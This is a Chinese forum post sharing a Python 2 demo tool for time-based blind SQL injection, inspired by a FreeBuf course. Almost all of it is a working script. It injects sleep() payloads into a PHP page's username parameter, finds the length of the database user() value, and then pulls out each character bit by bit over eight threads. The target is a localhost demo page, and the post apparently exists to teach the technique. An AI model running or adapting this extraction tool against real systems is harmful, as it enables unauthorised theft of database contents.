python利用二进制延迟注入demo

Jumbo

看了freebuf的延迟注入课程，感觉他那个突破延迟注入时间限制的思路非常不错 课程地址：http://yuntv.letv.com/bcloud.htm ... 1024&height=576

1. #!/usr/bin/env python
   
2. # -*- coding: utf-8 -*-
   
3. # @Author: Lcy
   
4. # @Date:   2015-08-29 22:26:17
   
5. # @Last Modified by:   Sunshie
   
6. # @Last Modified time: 2015-08-30 01:48:41
   
7. # blog:https://phpinfo.me
   
8. # 延迟注入工具
   
9. import urllib2
   
10. import time
    
11. import socket
    
12. import threading
    
13. import requests
    
14. 
    
15. class my_threading(threading.Thread):
    
16.                 def __init__(self, str,x):
    
17.                                 threading.Thread.__init__(self)
    
18.                                 self.str = str
    
19.                                 self.x = x
    
20.                 def run(self):
    
21.                         global res
    
22.                         x=self.x
    
23.                         j = self.str
    
24.                         url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
    
25.                         html = request(url)
    
26.                         verify = 'timeout'
    
27.                         if verify not in html:
    
28.                                 res[str(j)] = 0
    
29.                                 #print 1
    
30.                         else:
    
31.                                 res[str(j)] = 1
    
32.         
    
33. 
    
34. def request(URL):
    
35.         user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    
36.         req = urllib2.Request(URL, None, user_agent)  
    
37.         try:
    
38.                 request = urllib2.urlopen(req,timeout=2)
    
39.         except Exception ,e:
    
40.                 time.sleep(2)
    
41.                 return 'timeout'
    
42.         return request.read()         
    
43. 
    
44. def curl(url):
    
45.         try:
    
46.                         start = time.clock()
    
47.                         requests.get(url)
    
48.                         end = time.clock()
    
49.                         return int(end)
    
50.         except requests.RequestException as e:
    
51.                         print u"访问出错!"
    
52.                         exit()
    
53. def getLength():
    
54.         i = 0
    
55.         while True:
    
56.                 print "[+] Checking: %s \r" %i
    
57.                 url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
    
58.                 html = request(url)
    
59.                 verify = 'timeout'
    
60.                 if verify in html:
    
61.                         print u"[+] 数据长度为： %s" %i
    
62.                         return i
    
63.                
    
64.                 i = i + 1
    
65. def bin2dec(string_num):
    
66.         return int(string_num, 2)
    
67. 
    
68. def getData(dataLength):
    
69.         global res
    
70.         data = ""
    
71.         for x in range(dataLength):
    
72.                 x = x + 1
    
73.                 #print x
    
74.                 threads = []
    
75.                 for j in range(8):
    
76.                         result = ""
    
77.                         j = j + 1
    
78.                         sb = my_threading(j,x)
    
79.                         sb.setDaemon(True)
    
80.                         threads.append(sb)
    
81.                         #print j
    
82.                 for t in threads:
    
83.                                 t.start()
    
84.                 for t in threads:
    
85.                                 t.join()
    
86.                 #print res
    
87.                 tmp = ""
    
88.                 for i in range(8):
    
89.                         tmp = tmp + str(res[str(i+1)])
    
90.                 #print chr(bin2dec(tmp))
    
91.                 res = {}
    
92.                 result = chr(bin2dec(tmp))
    
93.                 print result
    
94.                 data = data + result
    
95.                 sb = None
    
96.         print "[+] ok!"
    
97.         print "[+] result:" + data
    
98. 
    
99. 
    
100. if __name__ == '__main__':
     
101.         stop = False
     
102.         res = {}
     
103.         length = getLength()
     
104.         getData(length)

复制代码